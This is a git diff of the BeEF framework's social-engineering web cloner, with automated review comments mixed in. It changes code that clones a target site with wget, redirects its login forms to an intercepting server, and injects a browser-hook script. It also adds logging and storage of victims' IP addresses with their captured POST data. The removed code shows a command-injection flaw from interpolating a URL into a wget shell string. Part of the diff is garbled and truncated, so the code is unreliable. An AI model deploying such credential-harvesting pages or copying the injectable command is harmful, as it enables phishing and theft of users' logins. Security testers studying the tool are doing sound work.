diff --git a/extensions/social_engineering/models/interceptor.rb b/extensions/social_engineering/models/interceptor.rb
index 9a72cf64d..ab92cdadd 100644
--- a/extensions/social_engineering/models/interceptor.rb
+++ b/extensions/social_engineering/models/interceptor.rb
@@ -23,7 +23,7 @@ module BeEF
 storage_names[:default] = 'extension_seng_interceptor'
 property :id, Serial
-
+ property :ip, Text, :lazy => false
 property :post_data, Text, :lazy => false
 belongs_to :webcloner
diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb
index fcb1c408b..cc3470333 100644
--- a/extensions/social_engineering/rest/socialengineering.rb
+++ b/extensions/social_engineering/rest/socialengineering.rb
@@ -53,7 +53,17 @@ module BeEF
 end
 web_cloner = BeEF::Extension::SocialEngineering::WebCloner.instance
- web_cloner.clone_page(uri,mount)
+ success = web_cloner.clone_page(uri,mount)
+ if success
+ result = {
+ "success" => true,
+ "mount" => mount
+ }.to_json
+ else
+ result = {
+ "success" => false
+ }.to_json
+ end
 end
 rescue Exception => e
diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
index d8d19dfaa..17e4e57c1 100644
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -25,7 +25,7 @@ module BeEF
 # intercept GET
 get "/" do
- print_info "GET request"
+ print_info "GET request from IP #{request.ip}"
 print_info "Referer: #{request.referer}"
 cloned_page = settings.cloned_page
 cloned_page
@@ -33,7 +33,7 @@ module BeEF
 # intercept POST
 post "/" do
- print_info "POST request"
+ print_info "POST request from IP #{request.ip}"
 request.body.rewind
 data = request.body.read
 print_info "Intercepted data:"
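Review bot: The failure branch in the `-53,7 +53,17` hunk of rest/socialengineering.rb builds `{ "success" => false }` with no reason attached, and nothing visible in the hunk sets a non-2xx status, so a REST client can only detect a failed clone by parsing the body. The two branches also differ only in the hash, so a single expression reads more directly: `result = (success ? { "success" => true, "mount" => mount } : { "success" => false }).to_json`. Whether `result` is the value the route actually returns depends on lines outside the hunk, since the enclosing block and its `rescue Exception => e` continue past it.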
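Review bot: `request.ip` is a request-derived string, and the `get "/"` and `post "/"` handlers interpolate it straight into `print_info`; the `-41,7 +41,8` hunk then stores it in the new `:ip` Text property added in models/interceptor.rb. As far as I know, Rack takes this value from the forwarding headers when the direct peer is a trusted proxy address, so behind a local reverse proxy it is whatever the client sent. Logging it as `#{request.ip.inspect}`, or stripping non-printable characters first, would keep control sequences out of the operator console. A short comment on the `:ip` property saying that the value is unverified would help readers of the table. Both handler bodies continue outside the hunks.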
@@ -41,7 +41,8 @@ module BeEF interceptor_db = BeEF::Core::Models::Interceptor.new( :webcloner_id => settings.db_entry.id, - :post_data => data + :post_data => data, + :ip => request.ip ) interceptor_db.save diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb index 1e3c68205..02637908d 100644 --- a/extensions/social_engineering/web_cloner/web_cloner.rb +++ b/extensions/social_engineering/web_cloner/web_cloner.rb @@ -34,55 +34,69 @@ module BeEF output_mod = "#{output}_mod" user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent') - #todo: prevent command injection using IO.popen passing an array of arguments - # see here: http://devblog.avdi.org/2012/03/29/generating-cows-with-io-popen/ - wget = "wget '#{url}' --no-check-certificate -c -k -U '#{user_agent}' -O #{@cloned_pages_dir + output}" - IO.popen(wget.to_s) { |f| result = f.gets } - File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file| - File.open("#{@cloned_pages_dir + output}", 'r').each do |line| - # Modify the
line changing the action URI to / in order to be properly intercepted by BeEF - if line.include?(" line changing the action URI to / in order to be properly intercepted by BeEF + if line.include?("") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook') + out_file.print add_beef_hook(line) + print_info "BeEF hook added :-D" + else + out_file.print line end - line_attrs[count] = "action=\"#{mount}\"" - mod_form = line_attrs.join(" ") - print_info "Form action value changed to / in order to be intercepted." - out_file.print mod_form - # Add the BeEF hook - elsif line.include?("") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook') - out_file.print add_beef_hook(line) - print_info "Added BeEF hook." - else - out_file.print line end end + + if File.size("#{@cloned_pages_dir + output}") > 0 + print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]" + + file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve + + # Check if the original URL can be framed + frameable = is_frameable(url) + + interceptor = BeEF::Extension::SocialEngineering::Interceptor + interceptor.set :redirect_to, url + interceptor.set :frameable, frameable + interceptor.set :beef_hook, @beef_hook + interceptor.set :cloned_page, get_page_content(file_path) + interceptor.set :db_entry, persist_page(url,mount) + + @http_server.mount("#{mount}", interceptor.new) + print_info "Mounting cloned page on URL [#{mount}]" + @http_server.remap + success = true + else + print_error "Error cloning #{url}. Be sure that you don't have errors while retrieving the page with 'wget'." + end end - print_info "Page at URL [#{url}] has been cloned. 
Modified HTML in [cloned_paged/#{output_mod}]" - - file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve - - # Check if the original URL can be framed - frameable = is_frameable(url) - - interceptor = BeEF::Extension::SocialEngineering::Interceptor - interceptor.set :redirect_to, url - interceptor.set :frameable, frameable - interceptor.set :beef_hook, @beef_hook - interceptor.set :cloned_page, get_page_content(file_path) - interceptor.set :db_entry, persist_page(url,mount) - - @http_server.mount("#{mount}", interceptor.new) - print_info "Mounting cloned page on URL [#{mount}]" - @http_server.remap + success end private
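Review bot: `File.size("#{@cloned_pages_dir + output}") > 0` raises `Errno::ENOENT` when the download produced no file at all, so that case bypasses the new `print_error` branch and surfaces as an exception instead of a `false` result. `if File.size?(@cloned_pages_dir + output)` returns nil for both a missing and an empty file, so it covers both. The new-side lines that invoke wget are not legible on this page, because the text between `line.include?("` and the form comment was lost in extraction. It is worth confirming there that `url` and `user_agent` reach wget as separate elements of an argument array passed to `IO.popen`, as the removed todo asked. The enclosing method, presumably `clone_page`, starts and ends outside what is readable here.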